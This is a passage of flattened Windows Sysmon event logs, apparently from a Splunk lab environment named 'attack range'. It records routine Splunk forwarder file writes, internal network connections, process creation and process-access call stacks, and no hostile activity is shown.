Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA010E804602C13EBFCACC287659164,SHA256=4959EDCC47FA4B110841167C96FB78F03FABD859F40745142EDAF69EBBFCEEB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:40.541{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC42224CD67D3AF4F0F9C126315950DB,SHA256=6806199ED1283E552589686FB4CCA5FBA736963F0174015AE9FEDF9DC5842804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:41.666{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA6F897C3C4D241B1C87F9995609C29A,SHA256=102072DF58C88B46F3042FC4847B08D662279E552E1EB41BB5AFD915D9AF4EF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:41.557{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D43B6F0D0CE1B5971F5FF0438664A51,SHA256=AAA725217D715083A9A4ED0E2147CE5B225CB93731896A988A9B8D1498F19C21,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:38.530{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53363-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:42.682{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0E8D313B00EE9D8069AF5804C4FF3F7,SHA256=8FC15C48340D4051250C2D265A919D291B39BDA4C3B9FD27B2469642991D7A26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:42.573{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9717B6CDA0E5D08896290F953F2ADC43,SHA256=B2CE3FE6784A6311AF7D98F0905E777E7957F3A3402B0679D8AEF13919428394,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:39.140{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53364-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000286855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:43.698{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B057CE36A841441C5354E6E98BCFACFB,SHA256=34A304A0D7EC6DEB80434711B759A2F9BAE843AB8CA53C5B89F9303FDA1F2EC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:43.588{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFB28C5D234A9880DAADF24654EFFEF9,SHA256=E2F8D827B85E56079AE91156AC593E58E22EFF36AE0B1CA362835FABD8D03F1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:42.991{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52708- 23542300x8000000000000000286856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:44.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B266A58518CFE28AF03C62FEEC9FE9C4,SHA256=A03B8A10164532E41503B0D4BD42E9FA11432ABED03B3E3D606F1AD33B5AFFA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:44.604{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9359E74B8573F0C1A282A6B58D37823D,SHA256=69E2CC21201FA57E3A79C76DDF1C9C440DB29F8AA3A2B1CA8434732217D579F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:43.609{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53366-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000286859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:42.994{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53365-false93.184.221.240-80http 23542300x8000000000000000286858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:45.729{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53CD89A139A471C984E6EE240AF0A158,SHA256=6B004682E60FCAA6902F4DE0DEC764F2B7B35266D669348BEEA06DCF7E014BA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.885{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.869{4F8D34B0-1059-6216-3504-000000003902}3548932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1059-6216-3504-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1059-6216-3504-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.682{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1059-6216-3504-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.683{4F8D34B0-1059-6216-3504-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.619{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBE9BBB019204E2099E1902686C683D2,SHA256=B938BB75136811240ABFCE28A534B77E3BCDB7CD13FDEEC6B0AC7B1B1D63198A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:42.653{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51279-false10.0.1.12-8000- 10341000x8000000000000000215736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1059-6216-3404-000000003902}1848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 